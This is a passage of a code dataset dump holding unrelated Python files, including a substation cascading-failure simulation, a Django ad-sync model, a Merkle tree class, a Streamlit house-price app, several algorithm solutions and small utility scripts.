Tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} 
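# --- Hedged sketch (editor's addition, not a dataset record): the RealSense
# script above times its pipeline stages by hand with five timestamps (t1..t5)
# and per-stage accumulators. A minimal, self-contained helper that captures
# the same per-stage averages with less bookkeeping; the class name
# `StageTimer` and the stage labels below are assumptions for illustration,
# not names from the original script.
import time
from collections import defaultdict
from contextlib import contextmanager


class StageTimer:
    """Accumulate wall-clock time per named stage and report per-stage averages."""

    def __init__(self):
        self.totals = defaultdict(float)
        self.counts = defaultdict(int)

    @contextmanager
    def stage(self, name):
        # Time the body of the `with` block and credit it to `name`.
        start = time.time()
        try:
            yield
        finally:
            self.totals[name] += time.time() - start
            self.counts[name] += 1

    def averages(self):
        return {name: self.totals[name] / self.counts[name] for name in self.totals}


# Hypothetical usage mirroring the loop above:
# timer = StageTimer()
# with timer.stage("queue"):
#     frame = frame_queue.wait_for_frame()
# with timer.stage("filter"):
#     depth_frame_filtered = temporal_filter.process(depth_frame_filtered)
# print(timer.averages())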
+{"seq_id":"37207455772","text":"\"\"\"\nDemo simulation script for osira using synthetic data.\n\nWritten by Ed Oughton.\n\nDecember 2020\n\n\"\"\"\nimport configparser\nimport os\nimport random\nimport pandas as pd\n\nfrom osira.sim import simulation, allocate_probabilities, cascading_failures\n\nCONFIG = configparser.ConfigParser()\nCONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))\nBASE_PATH = CONFIG['file_locations']['base_path']\n\nRESULTS = os.path.join(BASE_PATH, '..', 'results')\n\n\ndef load_data():\n \"\"\"\n Produce demo data.\n\n \"\"\"\n random.seed(42)\n\n data = {}\n\n for i in range(0, total_substation):\n data[i] = {\n 'id': i,\n 'population': random.randint(1e4, 1e5)\n }\n\n return data\n\n\ndef load_indirect_data():\n \"\"\"\n Produce indirect demo lookup table data.\n\n \"\"\"\n random.seed(42)\n\n data_indirect = {}\n\n for i in range(0, 100):\n\n rand = random.randint(1, 2)\n\n if rand == 1:\n function = 'Railway Station'\n elif rand == 2:\n function = 'Gas Distribution or Storage'\n else:\n print('Did not recognize selected int')\n\n data_indirect[i] = {\n 'dest_func': function,\n }\n\n return data_indirect\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(RESULTS):\n os.makedirs(RESULTS)\n\n total_substation = 100\n num_substations = [4, 7, 14]\n iterations = 1000\n probabilities = [0.5, 0.1, 0.01]\n\n data = load_data()\n\n all_results = simulation(data, num_substations, probabilities, iterations)\n\n data_indirect = load_indirect_data()\n\n all_results = cascading_failures(all_results, data_indirect)\n\n cp_scenarios = allocate_probabilities(all_results, num_substations, probabilities)\n\n all_results = pd.DataFrame(all_results)\n path = os.path.join(RESULTS, 'all_results.csv')\n all_results.to_csv(path, index=False)\n\n cp_scenarios = pd.DataFrame(cp_scenarios)\n path = os.path.join(RESULTS, 'cp_scenarios.csv')\n cp_scenarios.to_csv(path, index=False)\n","repo_name":"edwardoughton/osira","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"42123121519","text":"import decimal\nfrom django.db import models\nfrom django_extensions.db.models import TimeStampedModel\nfrom ads.api import adwords\nfrom ads.api import bingads\nfrom ads.api import facebookads\nfrom base import utils\nfrom clients.models import Client\n\n\nclass Ad(TimeStampedModel):\n \"\"\"Ads Data Report\"\"\"\n client = models.ForeignKey('clients.Client', related_name='ads', null=True)\n conversions_adwords = models.DecimalField(\n 'Conversions (Adwords)', max_digits=16, decimal_places=0, null=True)\n cost_adwords = models.DecimalField(\n 'Cost (AdWords)', max_digits=16, decimal_places=2, null=True)\n conversions_bingads = models.DecimalField(\n 'Conversions (BingAds)', max_digits=16, decimal_places=0, null=True)\n cost_bingads = models.DecimalField(\n 'Cost (BingAds)', max_digits=16, decimal_places=2, null=True)\n conversions_facebookads = models.DecimalField(\n 'Conversions (FacebookAds)', max_digits=16, decimal_places=0,\n null=True)\n cost_facebookads = models.DecimalField(\n 'Cost (FacebookAds)', max_digits=16, decimal_places=2, null=True)\n\n # TODO use a special structure instead of dictionary here. 
Consider this\n\n @property\n def facebookads(self):\n return {\n 'conversions': self.conversions_facebookads,\n 'planned_conversions': self.client.planned_conversions_facebookads,\n 'planned_cpa': self.client.planned_cpa_facebookads,\n 'spend': self.cost_facebookads,\n 'budget': self.client.planned_budget_facebookads\n }\n\n @property\n def bingads(self):\n return {\n 'conversions': self.conversions_bingads,\n 'planned_conversions': self.client.planned_conversions_bingads,\n 'planned_cpa': self.client.planned_cpa_bingads,\n 'spend': self.cost_bingads,\n 'budget': self.client.planned_budget_bingads\n }\n\n @property\n def adwords(self):\n return {\n 'conversions': self.conversions_adwords,\n 'planned_conversions': self.client.planned_conversions_adwords,\n 'planned_cpa': self.client.planned_cpa_adwords,\n 'spend': self.cost_adwords,\n 'budget': self.client.planned_budget_adwords,\n }\n\n def sync_adwords(self):\n if self.client.adwords_id:\n try:\n api = adwords.API()\n customer_id = utils.unique_id_serialize(self.client.adwords_id)\n data = api.get_report(api.account_performance_report(),\n customer_id, adwords.Serializer)\n\n if data:\n self.conversions_adwords = data['Conversions']\n self.cost_adwords = data['Cost']\n self.save()\n print(self.client)\n except:\n self.client.failed_tries += 1\n self.client.save()\n\n def sync_bingads(self):\n # TODO Do it once in an hour as init extacts all the data at the moment\n if self.client.bingads_id:\n api = bingads.API()\n for item in api.as_dataset().dict:\n if item['AccountId'] == self.client.bingads_id:\n self.conversions_bingads = int(item['Conversions'])\n self.cost_bingads = decimal.Decimal(item['Spend'])\n self.save()\n\n def sync_facebookads(self):\n if self.client.facebookads_id:\n api = facebookads.API(self.client.facebookads_id)\n if api.data:\n self.conversions_facebookads = api.data[\n 'cost_per_total_action']\n self.cost_facebookads = api.data['spend']\n self.save()\n\n @staticmethod\n def sync():\n \"\"\"Sync all enabled clients\"\"\"\n clients = Client.objects.filter(is_enabled=True)\n for client in clients:\n if not client.is_custom:\n ad = Ad(client=client)\n ad.sync_adwords()\n ad.sync_bingads()\n ad.sync_facebookads()\n\n class Meta:\n ordering = ['-created']\n","repo_name":"bentensoft/marketing-api","sub_path":"apps/ads/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18691887184","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 18 11:03:40 2022\r\n\r\n@author: carme\r\n\"\"\"\r\n\r\nclass Solution:\r\n def lengthOfLongestSubstring(self, s: str) -> int:\r\n count = len(s)\r\n newList = []\r\n sol = 0\r\n for x in range(count):\r\n for y in range(x, count):\r\n if(s[y] in newList):\r\n newList.clear()\r\n break\r\n else:\r\n newList.append(s[y])\r\n if(sol ...:\n \"\"\"\n Initialize the MerkleTools object\n\n Parameters\n ----------\n hash_type : str\n The hash function to use. 
Can be \"sha256\" or \"sha3\"\n secure : bool\n If True, use the hash function to hash the leaves before adding them to the tree.\n \"\"\"\n hash_type = hash_type.lower()\n if hash_type in [\n \"sha256\",\n \"md5\",\n \"sha224\",\n \"sha384\",\n \"sha512\",\n \"sha3_256\",\n \"sha3_224\",\n \"sha3_384\",\n \"sha3_512\",\n ]:\n self.hash_function = getattr(hashlib, hash_type)\n else:\n raise Exception(\"`hash_type` {} nor supported\".format(hash_type))\n\n self._secure = secure\n self.reset_tree()\n\n @property\n def secure(self) -> bool:\n \"\"\"Check if the Merkle tree is secure.\"\"\"\n return self._secure\n\n # SPECIAL METHODS\n def __len__(self) -> int:\n return self.get_leaf_count()\n\n def __str__(self) -> str:\n \"\"\"Get the string representation of the Merkle tree.\"\"\"\n if self.get_tree_ready_state():\n return str(self.levels)\n else:\n return \"Tree not ready\"\n\n def __hash__(self) -> int:\n \"\"\"Get the hash of the Merkle tree.\"\"\"\n return int(self.get_merkle_root(), 16)\n\n def __eq__(self, other: \"MerkleTools\") -> bool:\n \"\"\"Check if two Merkle trees are equal.\"\"\"\n return self.__hash__() == other.__hash__()\n\n def __repr__(self) -> str:\n \"\"\"Get the string representation of the Merkle tree.\"\"\"\n return self.__str__()\n\n # LEAF METHODS\n def _to_hex(self, x: bytes) -> ...:\n \"\"\"\n Convert a byte array to hex string\n\n Parameters\n ----------\n x : bytearray\n The byte array to convert\n\n Returns\n -------\n str\n The hex string representation of the byte array\n \"\"\"\n try: # python3\n return x.hex()\n except: # python2\n return binascii.hexlify(x)\n\n def reset_tree(self) -> ...:\n \"\"\"Reset the MerkleTools object to its initial state.\"\"\"\n self.leaves = list()\n self.levels = None\n self.is_ready = False\n\n def add_leaf(self, value: bytes) -> ...:\n \"\"\"\n Add a leaf to the Merkle tree.\n\n Parameters\n ----------\n value : bytes\n The leaf value to add to the tree.\n \"\"\"\n if self._secure:\n value = self.hash_function(value).hexdigest()\n value = bytearray.fromhex(value)\n else:\n value = bytearray(value)\n self.leaves.append(value)\n\n def get_leaf(self, index: int) -> str:\n \"\"\"\n Get the leaf value at the given index.\n \n Parameters\n ----------\n index : int\n\n Returns\n -------\n str\n \"\"\"\n return self._to_hex(self.leaves[index])\n\n def get_leaf_count(self) -> int:\n \"\"\"Get the number of leaves in the tree.\"\"\"\n return len(self.leaves)\n\n def get_tree_ready_state(self) -> bool:\n \"\"\"Check if the tree is ready to generate proofs.\"\"\"\n return self.is_ready\n\n def _calculate_next_level(self) -> ...:\n \"\"\"Calculate the next level of the tree.\"\"\"\n solo_leave = None\n N = len(self.levels[0]) # number of leaves on the level\n if N % 2 == 1: # if odd number of leaves on the level\n solo_leave = self.levels[0][-1]\n N -= 1\n\n new_level = []\n for l, r in zip(self.levels[0][0:N:2], self.levels[0][1:N:2]):\n new_level.append(self.hash_function(l + r).digest())\n if solo_leave is not None:\n new_level.append(solo_leave)\n self.levels = [\n new_level,\n ] + self.levels # prepend new level\n\n def make_tree(self) -> ...:\n \"\"\"Make the Merkle tree.\"\"\"\n self.is_ready = False\n if self.get_leaf_count() > 0:\n self.levels = [\n self.leaves,\n ]\n while len(self.levels[0]) > 1:\n self._calculate_next_level()\n self.is_ready = True\n\n def get_merkle_root(self) -> str:\n \"\"\"\n Get the Merkle root of the tree.\n\n Returns\n -------\n str\n \"\"\"\n if not (self.is_ready and self.levels is not None):\n 
raise ValueError(\"Tree is not ready. Call `make_tree` first.\")\n return self._to_hex(self.levels[0][0])\n\n def get_proof_of_inclusion(self, key: bytes) -> list:\n \"\"\"\n Get the proof for the leaf at the given index.\n\n Parameters\n ----------\n key : bytes\n The key to get the proof for.\n\n Returns\n -------\n list\n The proof for the leaf at the given index.\n \"\"\"\n if self._secure:\n key = self.hash_function(key).hexdigest()\n key = bytearray.fromhex(key)\n else:\n key = bytearray(key)\n\n index = self.leaves.index(key)\n if self.levels is None or not self.is_ready:\n raise ValueError(\"Tree is not ready. Call `make_tree()` first.\")\n elif index > len(self.leaves) - 1 or index < 0:\n raise ValueError(\"`index` {} is out of range\".format(index))\n else:\n proof = []\n for x in range(len(self.levels) - 1, 0, -1):\n level_len = len(self.levels[x])\n if (index == level_len - 1) and (\n level_len % 2 == 1\n ): # skip if this is an odd end node\n index = int(index / 2.0)\n continue\n is_right_node = index % 2\n sibling_index = index - 1 if is_right_node else index + 1\n sibling_pos = \"left\" if is_right_node else \"right\"\n sibling_value = self._to_hex(self.levels[x][sibling_index])\n proof.append({sibling_pos: sibling_value})\n index = int(index / 2.0)\n return proof\n\n def verify_proof_of_inclusion(\n self, proof: list, target_hash: bytes, merkle_root: bytes\n ) -> bool:\n \"\"\"\n Validate the proof for the leaf at the given index.\n\n Parameters\n ----------\n proof : list\n The proof for the leaf at the given index.\n target_hash : bytes\n The hash of the leaf to validate the proof for.\n merkle_root : bytes\n The Merkle root of the tree.\n\n Returns\n -------\n bool\n True if the proof is valid, False otherwise.\n \"\"\"\n if len(proof) == 0:\n return target_hash == merkle_root\n else:\n proof_hash = target_hash\n for p in proof:\n try:\n # the sibling is a left node\n sibling = bytearray.fromhex(p[\"left\"])\n proof_hash = self.hash_function(sibling + proof_hash).digest()\n except:\n # the sibling is a right node\n sibling = bytearray.fromhex(p[\"right\"])\n proof_hash = self.hash_function(proof_hash + sibling).digest()\n return proof_hash == merkle_root\n","repo_name":"BasKleinIkkink/pymt","sub_path":"src/pymt/trie/merkletools.py","file_name":"merkletools.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"929750033","text":"import numpy as np\r\nimport math\r\nimport cmath\r\n#CHPT gates\r\ndef H_gate():\r\n H = np.zeros((2,2))\r\n H[0,0] = 1\r\n H[0,1] = 1\r\n H[1,0] = 1\r\n H[1,1] = -1\r\n H = (1.0/math.sqrt(2))*H\r\n return H \r\ndef Z_theta(theta):\r\n Z = np.zeros((2,2), dtype=\"complex_\")\r\n itheta = 1j*theta\r\n Z[0,0] =1\r\n Z[1,1] = cmath.exp(itheta)\r\n return Z\r\n\r\ndef P_gate():\r\n return Z_theta(math.pi/2.0)\r\ndef T_gate():\r\n return Z_theta(math.pi/4.0)\r\n\r\ndef C_gate():\r\n C = np.zeros((4,4))\r\n C[0,0]=1\r\n C[1,1]=1\r\n C[3,2]=1\r\n C[2,3]=1\r\n return C\r\n\r\n\r\ndef generate_gate_lists_one():\r\n gate_list=[]\r\n funcs = [H_gate,P_gate,T_gate]\r\n for f in funcs:\r\n gate_list.append(f())\r\n\r\n return gate_list\r\n\r\nprint(generate_gate_lists_one())","repo_name":"DrVogtster/python","sub_path":"well/gates.py","file_name":"gates.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41429289824","text":"import streamlit as st\nimport 
","repo_name":"DrVogtster/python","sub_path":"well/gates.py","file_name":"gates.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41429289824","text":"import streamlit as st\nimport pandas as pd\nimport joblib\nfrom sklearn.ensemble import RandomForestClassifier\n\nst.write(\"\"\"\n# California Home Prediction App\nThis app predicts the **Home Price**!\n\"\"\")\n\nst.sidebar.header('User Input Parameters')\n\ndef user_input_features():\n    longitude = st.sidebar.slider('longitude', -124.350000, -114.310000, -119.569704)\n    latitude = st.sidebar.slider('latitude', 35.631861, 41.950000, 35.631861)\n    housingMedianAge = st.sidebar.slider('housingMedianAge', 1, 52, 28)\n    totalRooms = st.sidebar.slider('totalRooms', 2, 39320, 2635)\n    totalBedrooms = st.sidebar.slider('totalBedrooms', 1, 6445, 537)\n    population = st.sidebar.slider('population', 3, 35682, 1425)\n    households = st.sidebar.slider('households', 1, 6082, 499)\n    medianIncome = st.sidebar.slider('medianIncome', 0.499900, 15.000100, 3.870671)\n    data = {'longitude': longitude,\n            'latitude': latitude,\n            'housingMedianAge': housingMedianAge,\n            'totalRooms': totalRooms,\n            'totalBedrooms': totalBedrooms,\n            'population': population,\n            'households': households,\n            'medianIncome': medianIncome\n            }\n    features = pd.DataFrame(data, index=[0])\n    return features\n\ndf = user_input_features()\ndf_nonscaled = df.copy()\ndf_minmax = df.copy()\ndf_Zscore = df.copy()\ndf_XGB = df.copy()\nst.subheader('User Input parameters nonscaled')\nst.write(df_nonscaled)\n\n# Reads in saved scaler\nscaler = joblib.load(open('scaler_nm.save', 'rb'))\ndf_minmax = scaler.transform(df_minmax)\ndf_minmax = pd.DataFrame(df_minmax)\ndf_minmax.columns = ['longitude', 'latitude', 'housingMedianAge', 'totalRooms',\n                     'totalBedrooms', 'population', 'households', 'medianIncome']\n\nst.subheader('User Input parameters after min max scaling')\nst.write(df_minmax)\n\n# Reads in saved scaler\nscaler = joblib.load(open('scaler_standardscaler.save', 'rb'))\ndf_Zscore = scaler.transform(df_Zscore)\ndf_Zscore = pd.DataFrame(df_Zscore)\ndf_Zscore.columns = ['longitude', 'latitude', 'housingMedianAge', 'totalRooms',\n                     'totalBedrooms', 'population', 'households', 'medianIncome']\n\nst.subheader('User Input parameters after Z score scaling')\nst.write(df_Zscore)\n\n# ---------- no scaling below ----------\n\nst.header('WITHOUT NORMALIZATION OR STANDARDIZATION')\n# Random Forest Prediction\n# Reads in saved regression model\nloaded_RF_clf = joblib.load(open('VK_RF_Model all features.pkl', 'rb'))\nrf_prediction = loaded_RF_clf.predict(df_nonscaled)\nst.subheader('Random Forest Prediction df_nonscaled')\nst.write(rf_prediction)\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf = joblib.load(open('VK_lr_model.pkl', 'rb'))\nlr_prediction = loaded_LR_clf.predict(df_nonscaled)\nst.subheader('Linear Regression Prediction df_nonscaled')\nst.write(lr_prediction)\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf = joblib.load(open('VK_RR_Model.pkl', 'rb'))\nRR_prediction = loaded_RR_clf.predict(df_nonscaled)\nst.subheader('RIDGE Regression Prediction df_nonscaled')\nst.write(RR_prediction)\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf = joblib.load(open('VK_LASSO_Model.pkl', 'rb'))\nLASSO_prediction = loaded_LASSO_clf.predict(df_nonscaled)\nst.subheader('LASSO Regression Prediction df_nonscaled')\nst.write(LASSO_prediction)\n\n# XG Boost Prediction\n# loaded_XGB_clf = joblib.load(open('VK_xgboost_model.pkl', 'rb'))\n# del df_XGB['households']\n# del df_XGB['totalRooms']\n# del df_XGB['totalBedrooms']\n# xgb_prediction = loaded_XGB_clf.predict(df_XGB)\n# st.subheader('XGBoost no households, totalRooms and totalBedrooms & no scaling')\n# st.write(xgb_prediction)\n
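\n# Editor's note (sketch, not in the original app): every rerun reloads each\n# pickle from disk; Streamlit's resource cache avoids that, e.g.\n# @st.cache_resource\n# def load_model(path):\n#     return joblib.load(open(path, 'rb'))\n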
\n\nst.header('WITH NORMALIZATION min max')\n# ---------- min-max scaled models below ----------\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf_mm = joblib.load(open('VK_lr_model_mm.pkl', 'rb'))\nlr_prediction_mm = loaded_LR_clf_mm.predict(df_minmax)\nst.subheader('Linear Regression Prediction df_minmax')\nst.write(lr_prediction_mm)\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf_mm = joblib.load(open('VK_RR_Model_mm.pkl', 'rb'))\nRR_prediction_mm = loaded_RR_clf_mm.predict(df_minmax)\nst.subheader('RIDGE Regression Prediction df_minmax')\nst.write(RR_prediction_mm)\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf_mm = joblib.load(open('VK_LASSO_Model_mm.pkl', 'rb'))\nLASSO_prediction_mm = loaded_LASSO_clf_mm.predict(df_minmax)\nst.subheader('LASSO Regression Prediction df_minmax')\nst.write(LASSO_prediction_mm)\n\n# ELASTIC regression\n# Reads in saved regression model\nloaded_ELASTIC_clf_mm = joblib.load(open('VK_ELASTIC_Model_mm.pkl', 'rb'))\nELASTIC_prediction_mm = loaded_ELASTIC_clf_mm.predict(df_minmax)\nst.subheader('ELASTIC Regression Prediction df_minmax')\nst.write(ELASTIC_prediction_mm)\n\n\nst.header('WITH StandardScaler STANDARDIZATION')\n# ---------- Z-score scaled models below ----------\n\n# Linear regression\n# Reads in saved regression model\nloaded_LR_clf_standardscaler = joblib.load(open('VK_lr_model_standardscaler.pkl', 'rb'))\nlr_prediction_standardscaler = loaded_LR_clf_standardscaler.predict(df_Zscore)\nst.subheader('Linear Regression Prediction df_Zscore')\nst.write(lr_prediction_standardscaler)\n\n# RIDGE regression\n# Reads in saved regression model\nloaded_RR_clf_standardscaler = joblib.load(open('VK_RR_Model_standardscaler.pkl', 'rb'))\nRR_prediction_standardscaler = loaded_RR_clf_standardscaler.predict(df_Zscore)\nst.subheader('RIDGE Regression Prediction df_Zscore')\nst.write(RR_prediction_standardscaler)\n\n# LASSO regression\n# Reads in saved regression model\nloaded_LASSO_clf_standardscaler = joblib.load(open('VK_LASSO_Model_standardscaler.pkl', 'rb'))\nLASSO_prediction_standardscaler = loaded_LASSO_clf_standardscaler.predict(df_Zscore)\nst.subheader('LASSO Regression Prediction df_Zscore')\nst.write(LASSO_prediction_standardscaler)\n\n# ELASTIC regression\n# Reads in saved regression model\nloaded_ELASTIC_clf_standardscaler = joblib.load(open('VK_ELASTIC_Model_standardscaler.pkl', 'rb'))\nELASTIC_prediction_standardscaler = loaded_ELASTIC_clf_standardscaler.predict(df_Zscore)\nst.subheader('ELASTIC Regression Prediction df_Zscore')\nst.write(ELASTIC_prediction_standardscaler)\n","repo_name":"vkkurup/Project","sub_path":"Cal-state-house-price-predictor/homepredictor.py","file_name":"homepredictor.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74554982074","text":"import pandas as pd\nimport xlsxwriter\n
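\n# Editor's summary comment (added): this script reads one Excel sheet of FAQ\n# rows and starts a new faq<N>.xlsx workbook whenever the integer prefix of\n# the 'Question#' column changes.\n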
\ndef csv():\n    data = pd.read_excel(r'/home/mshamyl/python practise/python basic/ubl.xlsx')\n    df = pd.DataFrame(data, columns=['Topic',\n                                     'Question#',\n                                     'Question_English',\n                                     'Question_UR',\n                                     'Question_RU',\n                                     'Answer_English',\n                                     'Answer_UR',\n                                     'Answer_RU'\n                                     ])\n    counter = '1'\n    file_string = '/home/mshamyl/faq' + counter + '.xlsx'\n    print(file_string)\n    workbook = xlsxwriter.Workbook(file_string)\n    print(workbook)\n    worksheet = workbook.add_worksheet(\"faq\" + counter)\n    i = 0\n    col_list = ['Topic', 'Question#', 'Question_English', 'Question_UR', 'Question_RU', 'Answer_English', 'Answer_UR', 'Answer_RU']\n    for c in col_list:\n        worksheet.write(0, i, c)\n        i += 1\n    row = 1\n    for ind in df.index:\n        x = str(df['Question#'][ind])\n        y = str(x.split('.', 3)[0])  # integer prefix of the question number\n        column = 0\n        for d in df.iloc[ind]:\n            try:\n                worksheet.write(row, column, d)\n                column += 1\n            except Exception:\n                pass  # skip values xlsxwriter cannot serialise\n        row += 1\n        if str(counter) != y:  # question prefix changed -> start a new workbook\n            print(counter)\n            workbook.close()\n            counter = str(y)\n            file_string = '/home/mshamyl/faq' + counter + '.xlsx'\n            workbook = xlsxwriter.Workbook(file_string)\n            worksheet = workbook.add_worksheet(\"faq\" + counter)\n            print(workbook)\n            i = 0\n            for c in col_list:\n                worksheet.write(0, i, c)\n                i += 1\n            row = 1\n\n\nif __name__ == \"__main__\":\n    csv()","repo_name":"muhammadshamyl/python-modules","sub_path":"csv_file_split.py","file_name":"csv_file_split.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24405649031","text":"from tkinter import *\nfrom selenium import webdriver\nimport chromedriver_autoinstaller\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n\nmain_window = Tk()\n\n# labels\nLabel(main_window, text=\"Enter cartoon name\").grid(row=0, column=0)\n\n# text input\ncartoon = Entry(main_window, width=80, borderwidth=3)\ncartoon.grid(row=0, column=1)\n\n# radio buttons for episodes, movies or both\nvar = StringVar()\nvar.set(\" \")\nep = Radiobutton(main_window, text=\"Episodes\", variable=var, value=\"episodes\").grid(row=1, column=0)\nmov = Radiobutton(main_window, text=\"Movies\", variable=var, value=\"movies\")\nmov.grid(row=1, column=1)\nboth = Radiobutton(main_window, text=\"Both\", variable=var, value=\" \")\nboth.grid(row=1, column=2)\n\n\n# automation script with user input\ndef click_button():\n    chromedriver_autoinstaller.install()\n    driver = webdriver.Chrome()\n    driver.maximize_window()\n    driver.get(\"https://raretoonshindi.in/\")\n\n    search_btn = driver.find_element(by=By.XPATH, value=\"//*[@id='header']/div[1]/div/div/div/div[2]/div/span\")\n    search_btn.click()\n\n    search_bar = driver.find_element(by=By.XPATH, value=\"//*[@id='header']/div[1]/div/div/div/div[2]/div/div/form/input\")\n    search_bar.send_keys(cartoon.get() + \" \" + var.get(), Keys.ENTER)\n    main_window.destroy()\n    while True:  # keep the script (and browser) alive after the window closes\n        pass\n\n\n# button\nButton(main_window, text=\"Go!\", width=20, bg=\"red\", command=click_button).grid(row=2, column=1)\n\nmain_window.mainloop()\n
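\n# Editor's note (sketch, not in the original script): the while-True spin above\n# only keeps chromedriver alive after Tk is destroyed; a CPU-friendly variant:\n# input(\"Press Enter to close the browser...\")\n# driver.quit()\n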
","repo_name":"MdAsimKhan/Selenium-Webdriver-Automation","sub_path":"Download Old Cartoons/old_cartoon_download.py","file_name":"old_cartoon_download.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71859183996","text":"# 22.10.23\n# Maximize the difference (Baekjoon)\n# Silver 2\n# Brute force\n\n# Solution\nfrom collections import deque\n\nn = int(input())\nlst = list(map(int, input().rstrip().split()))\n\ndq = deque(sorted(lst))\na = dq.popleft()\nb = a\nanswer = 0\n\nwhile dq:\n    if abs(a-dq[0]) > abs(a-dq[-1]):\n        tmp_a = \"s\"\n    else:\n        tmp_a = \"e\"\n    if abs(b-dq[0]) > abs(b-dq[-1]):\n        tmp_b = \"s\"\n    else:\n        tmp_b = \"e\"\n\n    if tmp_b == \"s\" and tmp_a == \"s\":\n        if abs(a-dq[0]) > abs(b-dq[0]):\n            answer += abs(a-dq[0])\n            a = dq.popleft()\n        else:\n            answer += abs(b-dq[0])\n            b = dq.popleft()\n    elif tmp_a == \"s\":\n        if abs(a-dq[0]) > abs(b-dq[-1]):\n            answer += abs(a-dq[0])\n            a = dq.popleft()\n        else:\n            answer += abs(b-dq[-1])\n            b = dq.pop()\n    elif tmp_b == \"s\":\n        if abs(a-dq[-1]) > abs(b-dq[0]):\n            answer += abs(a-dq[-1])\n            a = dq.pop()\n        else:\n            answer += abs(b-dq[0])\n            b = dq.popleft()\n    else:\n        if abs(a-dq[-1]) > abs(b-dq[-1]):\n            answer += abs(a-dq[-1])\n            a = dq.pop()\n        else:\n            answer += abs(b-dq[-1])\n            b = dq.pop()\n\nprint(answer)\n\n# Brute force - recursion/backtracking\n# The difference from plain DFS is that unnecessary searches are skipped.\nn = int(input())\nnums = list(map(int, input().split()))\nvisited = [False]*n\nanswer = 0\n\ndef getAnswer(lst):\n    global answer\n    if len(lst) == n:\n        tmp = 0\n        for i in range(n-1):\n            tmp += abs(lst[i]-lst[i+1])\n        answer = max(answer, tmp)\n        return\n\n    for i in range(n):\n        if visited[i] == False:\n            visited[i] = True\n            getAnswer(lst + [nums[i]])\n            visited[i] = False\n\ngetAnswer([])\nprint(answer)\n\n# Brute force - permutations\nfrom itertools import permutations\n\nn = int(input())\nnums = list(map(int, input().split()))\nanswer = 0\n\nfor case in permutations(nums):\n    tmp = 0\n    for i in range(n-1):\n        tmp += abs(case[i]-case[i+1])\n    answer = max(answer, tmp)\n\nprint(answer)","repo_name":"915dbfl/youlAlgorithm","sub_path":"zip/backtracking/maximum_difference🙄.py","file_name":"maximum_difference🙄.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23932983710","text":"from utils.data_loader import DataLoader\nfrom utils.model import NaVieBayes\nfrom sklearn.metrics import accuracy_score, f1_score\nimport pickle\n\nloader = DataLoader()\nlen_vocab = len(loader.vocab)\nfeatures, target = loader.get_data()\nn = len(target)\nindexs = [i//2 if i % 2 == 0 else i//2 + n//2 for i in range(n)]\nfeatures = [features[i] for i in indexs]\ntarget = [target[i] for i in indexs]\nk_fold = 5\nbatch_size = len(target)//k_fold\n\nfor i in range(k_fold):\n    model = NaVieBayes(num_class=2, len_vocab=len_vocab, alpha=1)\n    features_train = features[0: batch_size*i] + features[batch_size*(i+1):]\n    target_train = target[0: batch_size*i] + target[batch_size*(i+1):]\n    features_test = features[batch_size*i: batch_size*(i+1)]\n    target_test = target[batch_size*i: batch_size*(i+1)]\n    model.fit(features_train, target_train)\n    y_pred = model.predict(features_test)\n    print('model {}: acc: {}, f1_score: {}'.format(i, accuracy_score(target_test, y_pred), f1_score(target_test, y_pred, average=None)))\n    with open('models/nb_model_' + str(i) + '.pkl', 'wb+') as f:\n        pickle.dump(model, f)\n
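\n# Editor's note (sketch, not in the original script): when len(target) is\n# divisible by 5, the contiguous test slices above match what\n# sklearn.model_selection.KFold(n_splits=5, shuffle=False) would produce.\n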
print('Done')\n","repo_name":"chiendb97/naive_bayes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10058151953","text":"requirementsSuccess = True\n\ntry:\n    import dateutil\nexcept ImportError:\n    requirementsSuccess = False\n\n\nasync def setup(bot):\n    if requirementsSuccess:\n        from .remindme import RemindMe\n        await bot.add_cog(RemindMe(bot))\n    else:\n        raise RuntimeError(\"You are missing requirements. Please run:\\n\"\n                           \"`pip3 install python-dateutil`\")\n","repo_name":"Sazmap/SazCogs","sub_path":"RemindMe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23964462091","text":"import requests\nimport random\n\n\nurl = \"https://openweathermap.org/\"\n\ncities = [\n    \"Praia,cv\",\n    \"Helsinki,fi\",\n    \"Dublin,ie\",\n    \"Bucharest,ro\",\n    